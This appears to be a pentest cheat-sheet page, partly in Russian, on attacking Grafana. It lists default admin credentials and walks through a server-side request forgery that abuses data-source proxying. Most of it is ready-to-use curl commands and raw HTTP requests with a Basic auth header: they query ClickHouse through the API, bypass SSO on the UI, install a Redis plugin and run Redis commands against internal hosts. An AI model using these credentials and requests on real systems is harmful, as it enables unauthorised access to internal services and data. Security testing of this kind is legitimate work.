Grafana

Default Creds

admin:admin

admin:prom-operator

admin:openbmp

SSRF

Присутствует возможность создать свой data source и обращаться к любому ресурсу по http/tcp, который был указан в качестве источника и получать ответ

PoC:

Развернем тестовую среду из 2 контейнеров: Grafana и Nginx.

создадим data source и выберем тип Prometheus, потому что он отправляет запросы по http. В качестве источника выберем nginx

Отправим запрос к api grafana /api/datasources, чтобы получить id нашего data soruce

с помощью curl -u admin:admin -s http://10.172.1.22:3000/api/datasources/proxy/4 отправим запрос на установленный ресурс и получим ответ

Мы можем отправлять запросы от лица grafana к любым ресурсам и по любым протоколам, в зависимости от datasources, которые мы найдем

Send requests to grafana-clickhouse-datasource via api

If Grafana's ui is behind SSO unlike api

{
  "queries": [
    {
      "refId": "A",
      "datasource": {
        "type": "grafana-clickhouse-datasource",
        "uid": "ce4qblsezmupsf"
      },
      "editorType": "sql",
      "queryType": "table",
      "rawSql": "SELECT * FROM system.databases",
      "format": 1,
      "meta": {
        "builderOptions": {
          "database": "",
          "table": "",
          "queryType": "table",
          "columns": [],
          "mode": "list",
          "limit": 1000
        },
        "timezone": "Europe/Moscow"
      },
      "pluginVersion": "4.5.0",
      "datasourceId": 8
    }
  ]
}

Create datasource

curl -s -u admin:prom-operator http://host:port/api/datasources/ -H "Content-Type: application/json"   -d '{
    "name":"redteam-test",
    "type":"alertmanager",
    "access":"proxy",
    "url":"http://targetHost:targetPort"
  }'

SSRF for redis datasource

In this example without auth

Install

POST /api/plugins/redis-datasource/install HTTP/1.1
Host: grafana-host:3000
Content-Length: 19
content-type: application/json
Authorization: Basic YWRtaW46cHJvbS1vcGVyYXRvcg==

{"version":"2.2.0"}

Create

POST /api/datasources/ HTTP/1.1
Host: grafana-host:3000
Content-Length: 719
content-type: application/json
Authorization: Basic YWRtaW46cHJvbS1vcGVyYXRvcg==

{"name":"redis-datasource","type":"redis-datasource","typeLogoUrl":"public/plugins/redis-datasource/img/logo.svg","access":"proxy","url":"redis://redis-ip:6379","user":"","database":"","basicAuth":false,"basicAuthUser":"","withCredentials":false,"isDefault":true,"jsonData":{},"secureJsonFields":{},"version":1,"readOnly":false,"accessControl":{"alert.instances.external:read":true,"alert.instances.external:write":true,"alert.notifications.external:read":true,"alert.notifications.external:write":true,"alert.rules.external:read":true,"alert.rules.external:write":true,"datasources.id:read":true,"datasources:delete":true,"datasources:query":true,"datasources:read":true,"datasources:write":true},"apiVersion":""}

Execute commands

POST /api/ds/query?ds_type=redis-datasource&requestId=explore_p34 HTTP/1.1
Host: grafana-host:3000
content-type: application/json
Authorization: Basic YWRtaW46cHJvbS1vcGVyYXRvcg==
Content-Length: 336

{"queries":[{"refId":"A","datasource":{"type":"redis-datasource","uid":"a7970ec5-1e24-4487-9f8b-630aac99b8ec"},"type":"cli","query":"keys *","command":"","keyName":"","field":"","filter":"","legend":"","value":"","path":"","cypher":"","datasourceId":4,"intervalMs":5000,"maxDataPoints":700}],"from":"1750785164811","to":"1750788764811"}

PreviousELK NextJenkins

Last updated 4 months ago